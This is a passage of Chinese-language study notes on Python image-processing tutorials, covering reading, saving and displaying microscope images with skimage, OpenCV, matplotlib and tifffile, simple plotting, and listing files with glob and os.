    Lossy conversion from float64 to uint8. Range [0, 1]. Convert image to uint8 prior to saving to suppress this warning.
    io.imsave('images/exported/saved_using_skimage.tif', gaussian_img)  # 打不开, 因为识别不出 float 格式的颜色
    from skimage import img_as_ubyte

    gaussian_img_8bit = img_as_ubyte(gaussian_img)
    io.imsave('images/exported/saved_using_skimage_8bit.tif', gaussian_img_8bit) # 此时可以打开

    OpenCV

    import cv2

    # OpenCV 并不会将浮点数映射到 0-255 之间, 而是直接取整, 所以会显示黑色的图片
    cv2.imwrite('images/exported/saved_using_opencv.jpg', gaussian_img)
    True
    # OpenCV 默认输出 BGR 颜色模型, 如果直接输出, 颜色会有变化
    cv2.imwrite('images/exported/saved_using_opencv_8bit.jpg', gaussian_img_8bit)
    True
    # 预处理后再输出
    gaussian_img_8bit_RGB = cv2.cvtColor(gaussian_img_8bit, cv2.COLOR_BGR2RGB)
    cv2.imwrite('images/exported/saved_using_opencv_8bit_RGB.jpg', gaussian_img_8bit_RGB)
    True

    matplotlib

    from matplotlib import pyplot as plt

    plt.imsave('images/exported/saved_using_pyplot.jpg', gaussian_img)

    tifffile

    import tifffile

    tifffile.imwrite('images/exported/saved_using_tifffile.tiff', gaussian_img)

    png

    Tutorial 25 - Viewing 2d images in python

    matplotlib

    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')

    io.imshow(img)
    <matplotlib.image.AxesImage at 0x1d668f31a08>

    png

    import matplotlib.pyplot as plt

    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1d66951bbc8>

    png

    cmap: 用多种风格显示灰度图像:

    pyplot cmap 颜色 - 知乎 (zhihu.com)

    png

    img_gray = io.imread('images/Osteosarcoma_01.tif', as_gray=True)
    plt.imshow(img_gray, cmap='hot')
    <matplotlib.image.AxesImage at 0x1d6698518c8>

    png

    plt.imshow(img_gray, cmap='jet')
    <matplotlib.image.AxesImage at 0x1d6698c9948>

    png

    plt.imshow(img_gray, cmap='Blues')
    <matplotlib.image.AxesImage at 0x1d66b5018c8>

    png

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img_gray, cmap='hot')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(img_gray, cmap='jet')
    ax2.title.set_text('2nd')

    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(img_gray, cmap='gray')
    ax3.title.set_text('3rd')

    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_gray, cmap='nipy_spectral')
    ax4.title.set_text('4th')
    plt.show()

    png

    OpenCV

    import cv2

    gray_img = cv2.imread("images/Osteosarcoma_01.tif", 0)
    color_img = cv2.imread("images/Osteosarcoma_01.tif", 1)

    # Use the function cv2.imshow() to display an image in a window.
    # First argument is the window name which is a string. second argument is our image.

    cv2.imshow("pic from skimage import", img) # Shows weird colors as R and B channels are swapped
    cv2.imshow("color pic from opencv", color_img)
    cv2.imshow("gray pic from opencv", gray_img)

    # Maintain output window until
    # user presses a key or 1000ms (1s)
    cv2.waitKey(0)

    # destroys all windows created
    cv2.destroyAllWindows()

    png

    Tutorial 26 - Basic plotting in python using matplot.pyplot

    教你怎么用 matplotlib 库

    • 画折线图
    from matplotlib import pyplot as plt

    x = [1, 2, 3, 4, 5]
    y = [1, 4, 9, 16, 25]

    plt.plot(x, y)
    [<matplotlib.lines.Line2D at 0x22168454048>]

    png

    import numpy as np

    a = np.array(x)
    b = np.array(y)
    plt.plot(a, b)
    [<matplotlib.lines.Line2D at 0x22168e11148>]

    png

    • 显示图片
    import cv2

    gray_img = cv2.imread('images/sandstone.tif', 0)

    plt.imshow(gray_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x2216b0b5908>

    png

    • 显示直方图
    plt.hist(gray_img.flat, bins=100, range=(0, 150))
    (array([  544.,    30.,    99.,    71.,   122.,    74.,   183.,    88.,          274.,   170.,   394.,   253.,   594.,   341.,   806.,   507.,         1145.,   626.,  1431.,   794.,  1808.,  1001.,  2091.,  1062.,         2303.,  1184.,  2352.,  1178.,  2271.,  1113.,  2083.,  1021.,         1830.,   803.,  1568.,   662.,  1367.,   680.,  1320.,   621.,         1218.,   613.,  1211.,   608.,  1206.,   634.,  1245.,   614.,         1325.,   686.,  1397.,   683.,  1371.,   715.,  1390.,   754.,         1493.,   756.,  1630.,   828.,  1763.,   916.,  1849.,   975.,         2028.,  1202.,  2575.,  1480.,  3536.,  2095.,  5313.,  3461.,         8307.,  4992., 12007.,  6800., 15600.,  8629., 18104.,  9210.,        18742.,  9243., 17429.,  8156., 14734.,  6413., 11317.,  4760.,         8432.,  3439.,  5933.,  2508.,  4391.,  1920.,  3222.,  1417.,         2677.,  1213.,  2205.,  1962.]), array([  0. ,   1.5,   3. ,   4.5,   6. ,   7.5,   9. ,  10.5,  12. ,         13.5,  15. ,  16.5,  18. ,  19.5,  21. ,  22.5,  24. ,  25.5,         27. ,  28.5,  30. ,  31.5,  33. ,  34.5,  36. ,  37.5,  39. ,         40.5,  42. ,  43.5,  45. ,  46.5,  48. ,  49.5,  51. ,  52.5,         54. ,  55.5,  57. ,  58.5,  60. ,  61.5,  63. ,  64.5,  66. ,         67.5,  69. ,  70.5,  72. ,  73.5,  75. ,  76.5,  78. ,  79.5,         81. ,  82.5,  84. ,  85.5,  87. ,  88.5,  90. ,  91.5,  93. ,         94.5,  96. ,  97.5,  99. , 100.5, 102. , 103.5, 105. , 106.5,        108. , 109.5, 111. , 112.5, 114. , 115.5, 117. , 118.5, 120. ,        121.5, 123. , 124.5, 126. , 127.5, 129. , 130.5, 132. , 133.5,        135. , 136.5, 138. , 139.5, 141. , 142.5, 144. , 145.5, 147. ,        148.5, 150. ]), <BarContainer object of 100 artists>)

    png

    • 显示图片样式
    from matplotlib import pyplot as plt
    import numpy as np

    a = np.array([1, 2, 3, 4, 5])
    b = np.array([1, 4, 9, 16, 25])

    plt.plot(a, b, 'r--')
    plt.axis([0, 6, 0, 50])
    (0.0, 6.0, 0.0, 50.0)

    png

    • 多种图形
    from matplotlib import pyplot as plt

    wells = ['well1', 'well2', 'well3', 'well4', 'well5']
    cells = [80, 62, 88, 110, 90]

    plt.bar(wells, cells) # 条形图
    plt.scatter(wells, cells) # 散点图
    plt.plot(wells, cells) # 折线图
    [<matplotlib.lines.Line2D at 0x2216c346dc8>]

    png

    from matplotlib import pyplot as plt

    # Adding labels and annotations
    wells = [1,2,3,4,5]
    cells = [80, 62, 88, 110, 90]

    plt.figure(figsize=(8, 8))
    plt.bar(wells, cells)
    plt.xlabel('Well #', fontsize=18, color='red')
    plt.ylabel('# dead cells')
    plt.title('Dead cells in each well')
    plt.axis([1, 6, 60, 120]) #xmin, xmax, ymin, ymax
    plt.grid(True) # 显示网格
    plt.show()

    png

    • 更改坐标轴单位
    from matplotlib import pyplot as plt

    x = [1,2,3,4,5]
    y = [10, 125, 1350, 11250, 100500]

    plt.figure(figsize=(12, 6))

    # linear
    plt.subplot(121)
    plt.plot(x, y)
    plt.yscale('linear')
    plt.title('linear')
    plt.grid(True)

    #Log
    plt.subplot(122)
    plt.plot(x, y)
    plt.yscale('log')
    plt.title('log')
    plt.grid(True)

    png

    • 显示多幅图片
     from matplotlib import pyplot as plt

    wells = ['well1', 'well2', 'well3', 'well4', 'well5']
    cells = [80, 62, 88, 110, 90]


    #Initialize the plot and sublots
    # Initialize the plot
    fig = plt.figure(figsize=(16,6))
    ax1 = fig.add_subplot(131)
    ax1.set(title='vertical bar', xlabel='Well #', ylabel='# cells')

    ax2 = fig.add_subplot(132)
    ax1.set(title='horizontal bar', xlabel='Well #', ylabel='# cells')

    ax3 = fig.add_subplot(133)

    # Plot the data
    ax1.bar(wells, cells)
    ax2.barh(wells, cells)
    ax3.plot(wells, cells)

    plt.savefig("images/my_plot.jpg") # Save plot
    # Show the plot
    plt.show()

    png

    Tutorial 27 - Using glob to read multiple files in python

    Python 模块之 glob 模块 - 知乎

    使用 glob 遍历某个文件夹, 得到这个文件夹下面所有文件的名称

    • 一次性得到整个列表
    import cv2
    import glob

    file_list = glob.glob('images/*.*')
    file_list
    ['images\\Alloy_gradient.jpg', 'images\\BSE.tif', 'images\\bubbles.tif', 'images\\cast_iron1.tif', 'images\\cast_iron2.jpg', 'images\\monalisa.jpg', 'images\\Osteosarcoma_01.tif', 'images\\Osteosarcoma_01_1sigma_blur.tif', 'images\\Osteosarcoma_01_25Sigma_noise.tif', 'images\\Osteosarcoma_01_2sigma_blur.tif', 'images\\Osteosarcoma_01_8bit.ome.tiff', 'images\\Osteosarcoma_01_8bit_salt_pepper.tif', 'images\\Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 'images\\Osteosarcoma_01_small.tif', 'images\\Osteosarcoma_01_transl.tif', 'images\\Osteosarcoma_01_transl_rot.tif', 'images\\sandstone.tif', 'images\\sandstone_blur_2sigma.tif', 'images\\sandstone_low_contrast.tif', 'images\\scratch_time_series.tif', 'images\\synthetic.jpg', 'images\\Ti_powder.tif', 'images\\Ti_powder_single.tif']
    • 通过 for 循环得到列表
    my_list = []
    path = 'images/*.*'
    for file in glob.glob(path):
    print(file)
    a = cv2.imread(file)
    my_list.append(a)
    images\Alloy_gradient.jpgimages\BSE.tifimages\bubbles.tifimages\cast_iron1.tifimages\cast_iron2.jpgimages\monalisa.jpgimages\Osteosarcoma_01.tifimages\Osteosarcoma_01_1sigma_blur.tifimages\Osteosarcoma_01_25Sigma_noise.tifimages\Osteosarcoma_01_2sigma_blur.tifimages\Osteosarcoma_01_8bit.ome.tiffimages\Osteosarcoma_01_8bit_salt_pepper.tifimages\Osteosarcoma_01_8bit_salt_pepper_cropped.tifimages\Osteosarcoma_01_small.tifimages\Osteosarcoma_01_transl.tifimages\Osteosarcoma_01_transl_rot.tifimages\sandstone.tifimages\sandstone_blur_2sigma.tifimages\sandstone_low_contrast.tifimages\scratch_time_series.tifimages\synthetic.jpgimages\Ti_powder.tifimages\Ti_powder_single.tif

    Tutorial 28 - Using os.listdir to read multiple files

    • 使用 os.listdir
    import os

    path = 'images/'
    print(os.listdir(path))

    for image in os.listdir(path):
    print(image)
    ['Alloy_gradient.jpg', 'BSE.tif', 'bubbles.tif', 'cast_iron1.tif', 'cast_iron2.jpg', 'exported', 'monalisa.jpg', 'Osteosarcoma_01.tif', 'Osteosarcoma_01_1sigma_blur.tif', 'Osteosarcoma_01_25Sigma_noise.tif', 'Osteosarcoma_01_2sigma_blur.tif', 'Osteosarcoma_01_8bit.ome.tiff', 'Osteosarcoma_01_8bit_salt_pepper.tif', 'Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 'Osteosarcoma_01_small.tif', 'Osteosarcoma_01_transl.tif', 'Osteosarcoma_01_transl_rot.tif', 'sandstone.tif', 'sandstone_blur_2sigma.tif', 'sandstone_low_contrast.tif', 'scratch_time_series.tif', 'synthetic.jpg', 'Ti_powder.tif', 'Ti_powder_single.tif']Alloy_gradient.jpgBSE.tifbubbles.tifcast_iron1.tifcast_iron2.jpgexportedmonalisa.jpgOsteosarcoma_01.tifOsteosarcoma_01_1sigma_blur.tifOsteosarcoma_01_25Sigma_noise.tifOsteosarcoma_01_2sigma_blur.tifOsteosarcoma_01_8bit.ome.tiffOsteosarcoma_01_8bit_salt_pepper.tifOsteosarcoma_01_8bit_salt_pepper_cropped.tifOsteosarcoma_01_small.tifOsteosarcoma_01_transl.tifOsteosarcoma_01_transl_rot.tifsandstone.tifsandstone_blur_2sigma.tifsandstone_low_contrast.tifscratch_time_series.tifsynthetic.jpgTi_powder.tifTi_powder_single.tif
    • 使用 os.walk 遍历文件
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
    # root 表示当前正在访问的文件夹路径
    # dirs 表示该文件夹下的子目录名 list
    # files 表示该文件夹下的文件 list
    # 遍历文件
    for f in files:
    print(os.path.join(root, f))
    <generator object walk at 0x000001AAF06408C8>.\4.ipynb.\Untitled.ipynb.\Untitled1.ipynb.\Untitled2.ipynb.\Untitled3.ipynb.\Untitled4.ipynb.\Untitled5.ipynb.\Untitled6.ipynb.\Untitled7.ipynb.\Untitled8.ipynb.\Untitled9.ipynb.\.ipynb_checkpoints\4-checkpoint.ipynb.\.ipynb_checkpoints\Untitled-checkpoint.ipynb.\.ipynb_checkpoints\Untitled1-checkpoint.ipynb.\.ipynb_checkpoints\Untitled2-checkpoint.ipynb.\.ipynb_checkpoints\Untitled3-checkpoint.ipynb.\.ipynb_checkpoints\Untitled4-checkpoint.ipynb.\.ipynb_checkpoints\Untitled5-checkpoint.ipynb.\.ipynb_checkpoints\Untitled6-checkpoint.ipynb.\.ipynb_checkpoints\Untitled7-checkpoint.ipynb.\.ipynb_checkpoints\Untitled8-checkpoint.ipynb.\.ipynb_checkpoints\Untitled9-checkpoint.ipynb.\images\Alloy_gradient.jpg.\images\BSE.tif.\images\bubbles.tif.\images\cast_iron1.tif.\images\cast_iron2.jpg.\images\monalisa.jpg.\images\Osteosarcoma_01.tif.\images\Osteosarcoma_01_1sigma_blur.tif.\images\Osteosarcoma_01_25Sigma_noise.tif.\images\Osteosarcoma_01_2sigma_blur.tif.\images\Osteosarcoma_01_8bit.ome.tiff.\images\Osteosarcoma_01_8bit_salt_pepper.tif.\images\Osteosarcoma_01_8bit_salt_pepper_cropped.tif.\images\Osteosarcoma_01_small.tif.\images\Osteosarcoma_01_transl.tif.\images\Osteosarcoma_01_transl_rot.tif.\images\sandstone.tif.\images\sandstone_blur_2sigma.tif.\images\sandstone_low_contrast.tif.\images\scratch_time_series.tif.\images\synthetic.jpg.\images\Ti_powder.tif.\images\Ti_powder_single.tif.\images\exported\saved_using_opencv.jpg.\images\exported\saved_using_opencv.tif.\images\exported\saved_using_opencv_8bit.jpg.\images\exported\saved_using_opencv_8bit_RGB.jpg.\images\exported\saved_using_pyplot.jpg.\images\exported\saved_using_skimage.jpg.\images\exported\saved_using_skimage.tif.\images\exported\saved_using_skimage_8bit.tif.\images\exported\saved_using_tifffile.tiff
    • 使用 os.walk 遍历文件夹
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
    # root 表示当前正在访问的文件夹路径
    # dirs 表示该文件夹下的子目录名 list
    # files 表示该文件夹下的文件 list
    # 遍历所有的文件夹
    for d in dirs:
    print(os.path.join(root, d))
    <generator object walk at 0x000001AAF06406C8>.\.ipynb_checkpoints.\images.\images\exported
    ]]>
    + 正文

    数字图像处理的基本步骤

    • 图像获取
    • 图像增强:对图像进行某种操作,使结果在特定应用中比原图像更为合适的过程
    • 图像复原:改善图像外观的一个领域,倾向于以图像退化的数学或概率模型为基础
    • 彩色图像处理
    • 小波:以不同分辨率来表示图像的基础
    • 形态学处理:提取图像中用于表示和描述形状的成分的处理工具
    • 分割:将一幅图像划分为各个组成部分和目标
    • 特征提取
    • 图像模式分类:根据目标特征描述子对目标赋予标记的过程

    Tutorial 22 - Reading images into Python

    Reading Images into Python

    • scikit-image: pip install scikit-image
    • opencv: pip install opencv-python
    • Pillow: PIL - does not import images as numpy array. You can convert using numpy.asarray(img)

    使用 skimage 读取图像

    1
    2
    3
    4
    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')
    img.shape # y, x, c, dtype=uint8
    (1104, 1376, 3)
    • 转成 float 格式
    1
    2
    3
    from skimage import io, img_as_float

    img2 = img_as_float(img)

    不要使用 .astype(np.float)

    1
    2
    3
    import numpy as np

    img3 = img.astype(np.float64)

    转换成 uint8 格式的图像

    1
    2
    3
    from skimage import io, img_as_ubyte

    img_8bit = img_as_ubyte(img2)

    png

    使用 OpenCV 读取图像

    1
    2
    3
    4
    5
    6
    import cv2

    img_cv2 = cv2.imread('images/Osteosarcoma_01.tif') # 彩色图像
    grey_img = cv2.imread('images/Osteosarcoma_01.tif', 0) # 灰度图像
    color_img = cv2.imread('images/Osteosarcoma_01.tif', 1) # 彩色图像
    img_opencv = cv2.cvtColor(color_img, cv2.COLOR_BGR2RGB) # 将图像转为 RGB 格式

    OpenCV 默认使用 BGR 颜色空间, skimage 默认使用 RGB 颜色空间

    png

    Tutorial 23 - Reading proprietary images in python

    • 使用 Python 读取专有图像文件
    1
    2
    3
    import tifffile

    img = tifffile.imread('images/Osteosarcoma_01.tif')
    1
    2
    3
    from skimage import io

    img2 = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
    • tif 还有 3D image 格式 和 Time series 格式

    • 还可以读取 czi(显微镜图像格式) 格式 (Time series, scenes, channels, y, x, z, RGB)

    好专业的图像格式…

    1
    2
    3
    4
    5
    6
    7
    # Let us extract only relevant pixels, all channels in x and y
    img1 = img[0, 0, :, :, :, 0] # 分离出高, 宽, 通道

    # Next, let us extract each channel image.
    img2 = img1[0, :, :] # 第一个通道 Red
    img3 = img1[0, :, :] # 第二个通道 Green
    img4 = img1[2, :, :] # 第三个通道 Blue DAPI

    Tutorial 24 - Saving images from python to your local drive

    skimage

    1
    2
    3
    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')
    1
    2
    3
    from skimage import filters

    gaussian_img = filters.gaussian(img, sigma=3) # 此时图像会变成 float 形式
    1
    io.imsave('images/exported/saved_using_skimage.jpg', gaussian_img)
    Lossy conversion from float64 to uint8. Range [0, 1]. Convert image to uint8 prior to saving to suppress this warning.
    1
    io.imsave('images/exported/saved_using_skimage.tif', gaussian_img)  # 打不开, 因为识别不出 float 格式的颜色
    1
    2
    3
    4
    from skimage import img_as_ubyte

    gaussian_img_8bit = img_as_ubyte(gaussian_img)
    io.imsave('images/exported/saved_using_skimage_8bit.tif', gaussian_img_8bit) # 此时可以打开

    OpenCV

    1
    2
    3
    4
    import cv2

    # OpenCV 并不会将浮点数映射到 0-255 之间, 而是直接取整, 所以会显示黑色的图片
    cv2.imwrite('images/exported/saved_using_opencv.jpg', gaussian_img)
    True
    1
    2
    # OpenCV 默认输出 BGR 颜色模型, 如果直接输出, 颜色会有变化
    cv2.imwrite('images/exported/saved_using_opencv_8bit.jpg', gaussian_img_8bit)
    True
    1
    2
    3
    # 预处理后再输出
    gaussian_img_8bit_RGB = cv2.cvtColor(gaussian_img_8bit, cv2.COLOR_BGR2RGB)
    cv2.imwrite('images/exported/saved_using_opencv_8bit_RGB.jpg', gaussian_img_8bit_RGB)
    True

    matplotlib

    1
    2
    3
    from matplotlib import pyplot as plt

    plt.imsave('images/exported/saved_using_pyplot.jpg', gaussian_img)

    tifffile

    1
    2
    3
    import tifffile

    tifffile.imwrite('images/exported/saved_using_tifffile.tiff', gaussian_img)

    png

    Tutorial 25 - Viewing 2d images in python

    matplotlib

    1
    2
    3
    4
    5
    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')

    io.imshow(img)
    <matplotlib.image.AxesImage at 0x1d668f31a08>

    png

    1
    2
    3
    import matplotlib.pyplot as plt

    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1d66951bbc8>

    png

    cmap: 用多种风格显示灰度图像:

    pyplot cmap 颜色 - 知乎 (zhihu.com)

    png

    1
    img_gray = io.imread('images/Osteosarcoma_01.tif', as_gray=True)
    1
    plt.imshow(img_gray, cmap='hot')
    <matplotlib.image.AxesImage at 0x1d6698518c8>

    png

    1
    plt.imshow(img_gray, cmap='jet')
    <matplotlib.image.AxesImage at 0x1d6698c9948>

    png

    1
    plt.imshow(img_gray, cmap='Blues')
    <matplotlib.image.AxesImage at 0x1d66b5018c8>

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img_gray, cmap='hot')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(img_gray, cmap='jet')
    ax2.title.set_text('2nd')

    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(img_gray, cmap='gray')
    ax3.title.set_text('3rd')

    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_gray, cmap='nipy_spectral')
    ax4.title.set_text('4th')
    plt.show()

    png

    OpenCV

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    import cv2

    gray_img = cv2.imread("images/Osteosarcoma_01.tif", 0)
    color_img = cv2.imread("images/Osteosarcoma_01.tif", 1)

    # Use the function cv2.imshow() to display an image in a window.
    # First argument is the window name which is a string. second argument is our image.

    cv2.imshow("pic from skimage import", img) # Shows weird colors as R and B channels are swapped
    cv2.imshow("color pic from opencv", color_img)
    cv2.imshow("gray pic from opencv", gray_img)

    # Maintain output window until
    # user presses a key or 1000ms (1s)
    cv2.waitKey(0)

    # destroys all windows created
    cv2.destroyAllWindows()

    png

    Tutorial 26 - Basic plotting in python using matplot.pyplot

    教你怎么用 matplotlib 库

    • 画折线图
    1
    2
    3
    4
    5
    6
    from matplotlib import pyplot as plt

    x = [1, 2, 3, 4, 5]
    y = [1, 4, 9, 16, 25]

    plt.plot(x, y)
    [<matplotlib.lines.Line2D at 0x22168454048>]

    png

    1
    2
    3
    4
    5
    import numpy as np

    a = np.array(x)
    b = np.array(y)
    plt.plot(a, b)
    [<matplotlib.lines.Line2D at 0x22168e11148>]

    png

    • 显示图片
    1
    2
    3
    4
    5
    import cv2

    gray_img = cv2.imread('images/sandstone.tif', 0)

    plt.imshow(gray_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x2216b0b5908>

    png

    • 显示直方图
    1
    plt.hist(gray_img.flat, bins=100, range=(0, 150))
    (array([  544.,    30.,    99.,    71.,   122.,    74.,   183.,    88.,          274.,   170.,   394.,   253.,   594.,   341.,   806.,   507.,         1145.,   626.,  1431.,   794.,  1808.,  1001.,  2091.,  1062.,         2303.,  1184.,  2352.,  1178.,  2271.,  1113.,  2083.,  1021.,         1830.,   803.,  1568.,   662.,  1367.,   680.,  1320.,   621.,         1218.,   613.,  1211.,   608.,  1206.,   634.,  1245.,   614.,         1325.,   686.,  1397.,   683.,  1371.,   715.,  1390.,   754.,         1493.,   756.,  1630.,   828.,  1763.,   916.,  1849.,   975.,         2028.,  1202.,  2575.,  1480.,  3536.,  2095.,  5313.,  3461.,         8307.,  4992., 12007.,  6800., 15600.,  8629., 18104.,  9210.,        18742.,  9243., 17429.,  8156., 14734.,  6413., 11317.,  4760.,         8432.,  3439.,  5933.,  2508.,  4391.,  1920.,  3222.,  1417.,         2677.,  1213.,  2205.,  1962.]), array([  0. ,   1.5,   3. ,   4.5,   6. ,   7.5,   9. ,  10.5,  12. ,         13.5,  15. ,  16.5,  18. ,  19.5,  21. ,  22.5,  24. ,  25.5,         27. ,  28.5,  30. ,  31.5,  33. ,  34.5,  36. ,  37.5,  39. ,         40.5,  42. ,  43.5,  45. ,  46.5,  48. ,  49.5,  51. ,  52.5,         54. ,  55.5,  57. ,  58.5,  60. ,  61.5,  63. ,  64.5,  66. ,         67.5,  69. ,  70.5,  72. ,  73.5,  75. ,  76.5,  78. ,  79.5,         81. ,  82.5,  84. ,  85.5,  87. ,  88.5,  90. ,  91.5,  93. ,         94.5,  96. ,  97.5,  99. , 100.5, 102. , 103.5, 105. , 106.5,        108. , 109.5, 111. , 112.5, 114. , 115.5, 117. , 118.5, 120. ,        121.5, 123. , 124.5, 126. , 127.5, 129. , 130.5, 132. , 133.5,        135. , 136.5, 138. , 139.5, 141. , 142.5, 144. , 145.5, 147. ,        148.5, 150. ]), <BarContainer object of 100 artists>)

    png

    • 显示图片样式
    1
    2
    3
    4
    5
    6
    7
    8
    from matplotlib import pyplot as plt
    import numpy as np

    a = np.array([1, 2, 3, 4, 5])
    b = np.array([1, 4, 9, 16, 25])

    plt.plot(a, b, 'r--')
    plt.axis([0, 6, 0, 50])
    (0.0, 6.0, 0.0, 50.0)

    png

    • 多种图形
    1
    2
    3
    4
    5
    6
    7
    8
    from matplotlib import pyplot as plt

    wells = ['well1', 'well2', 'well3', 'well4', 'well5']
    cells = [80, 62, 88, 110, 90]

    plt.bar(wells, cells) # 条形图
    plt.scatter(wells, cells) # 散点图
    plt.plot(wells, cells) # 折线图
    [<matplotlib.lines.Line2D at 0x2216c346dc8>]

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    from matplotlib import pyplot as plt

    # Adding labels and annotations
    wells = [1,2,3,4,5]
    cells = [80, 62, 88, 110, 90]

    plt.figure(figsize=(8, 8))
    plt.bar(wells, cells)
    plt.xlabel('Well #', fontsize=18, color='red')
    plt.ylabel('# dead cells')
    plt.title('Dead cells in each well')
    plt.axis([1, 6, 60, 120]) #xmin, xmax, ymin, ymax
    plt.grid(True) # 显示网格
    plt.show()

    png

    • 更改坐标轴单位
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    from matplotlib import pyplot as plt

    x = [1,2,3,4,5]
    y = [10, 125, 1350, 11250, 100500]

    plt.figure(figsize=(12, 6))

    # linear
    plt.subplot(121)
    plt.plot(x, y)
    plt.yscale('linear')
    plt.title('linear')
    plt.grid(True)

    #Log
    plt.subplot(122)
    plt.plot(x, y)
    plt.yscale('log')
    plt.title('log')
    plt.grid(True)

    png

    • 显示多幅图片
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
     from matplotlib import pyplot as plt

    wells = ['well1', 'well2', 'well3', 'well4', 'well5']
    cells = [80, 62, 88, 110, 90]


    #Initialize the plot and sublots
    # Initialize the plot
    fig = plt.figure(figsize=(16,6))
    ax1 = fig.add_subplot(131)
    ax1.set(title='vertical bar', xlabel='Well #', ylabel='# cells')

    ax2 = fig.add_subplot(132)
    ax1.set(title='horizontal bar', xlabel='Well #', ylabel='# cells')

    ax3 = fig.add_subplot(133)

    # Plot the data
    ax1.bar(wells, cells)
    ax2.barh(wells, cells)
    ax3.plot(wells, cells)

    plt.savefig("images/my_plot.jpg") # Save plot
    # Show the plot
    plt.show()

    png

    Tutorial 27 - Using glob to read multiple files in python

    Python 模块之 glob 模块 - 知乎

    使用 glob 遍历某个文件夹, 得到这个文件夹下面所有文件的名称

    • 一次性得到整个列表
    1
    2
    3
    4
    5
    import cv2
    import glob

    file_list = glob.glob('images/*.*')
    file_list
    ['images\\Alloy_gradient.jpg', 'images\\BSE.tif', 'images\\bubbles.tif', 'images\\cast_iron1.tif', 'images\\cast_iron2.jpg', 'images\\monalisa.jpg', 'images\\Osteosarcoma_01.tif', 'images\\Osteosarcoma_01_1sigma_blur.tif', 'images\\Osteosarcoma_01_25Sigma_noise.tif', 'images\\Osteosarcoma_01_2sigma_blur.tif', 'images\\Osteosarcoma_01_8bit.ome.tiff', 'images\\Osteosarcoma_01_8bit_salt_pepper.tif', 'images\\Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 'images\\Osteosarcoma_01_small.tif', 'images\\Osteosarcoma_01_transl.tif', 'images\\Osteosarcoma_01_transl_rot.tif', 'images\\sandstone.tif', 'images\\sandstone_blur_2sigma.tif', 'images\\sandstone_low_contrast.tif', 'images\\scratch_time_series.tif', 'images\\synthetic.jpg', 'images\\Ti_powder.tif', 'images\\Ti_powder_single.tif']
    • 通过 for 循环得到列表
    1
    2
    3
    4
    5
    6
    my_list = []
    path = 'images/*.*'
    for file in glob.glob(path):
    print(file)
    a = cv2.imread(file)
    my_list.append(a)
    images\Alloy_gradient.jpgimages\BSE.tifimages\bubbles.tifimages\cast_iron1.tifimages\cast_iron2.jpgimages\monalisa.jpgimages\Osteosarcoma_01.tifimages\Osteosarcoma_01_1sigma_blur.tifimages\Osteosarcoma_01_25Sigma_noise.tifimages\Osteosarcoma_01_2sigma_blur.tifimages\Osteosarcoma_01_8bit.ome.tiffimages\Osteosarcoma_01_8bit_salt_pepper.tifimages\Osteosarcoma_01_8bit_salt_pepper_cropped.tifimages\Osteosarcoma_01_small.tifimages\Osteosarcoma_01_transl.tifimages\Osteosarcoma_01_transl_rot.tifimages\sandstone.tifimages\sandstone_blur_2sigma.tifimages\sandstone_low_contrast.tifimages\scratch_time_series.tifimages\synthetic.jpgimages\Ti_powder.tifimages\Ti_powder_single.tif

    Tutorial 28 - Using os.listdir to read multiple files

    • 使用 os.listdir
    1
    2
    3
    4
    5
    6
    7
    import os

    path = 'images/'
    print(os.listdir(path))

    for image in os.listdir(path):
    print(image)
    ['Alloy_gradient.jpg', 'BSE.tif', 'bubbles.tif', 'cast_iron1.tif', 'cast_iron2.jpg', 'exported', 'monalisa.jpg', 'Osteosarcoma_01.tif', 'Osteosarcoma_01_1sigma_blur.tif', 'Osteosarcoma_01_25Sigma_noise.tif', 'Osteosarcoma_01_2sigma_blur.tif', 'Osteosarcoma_01_8bit.ome.tiff', 'Osteosarcoma_01_8bit_salt_pepper.tif', 'Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 'Osteosarcoma_01_small.tif', 'Osteosarcoma_01_transl.tif', 'Osteosarcoma_01_transl_rot.tif', 'sandstone.tif', 'sandstone_blur_2sigma.tif', 'sandstone_low_contrast.tif', 'scratch_time_series.tif', 'synthetic.jpg', 'Ti_powder.tif', 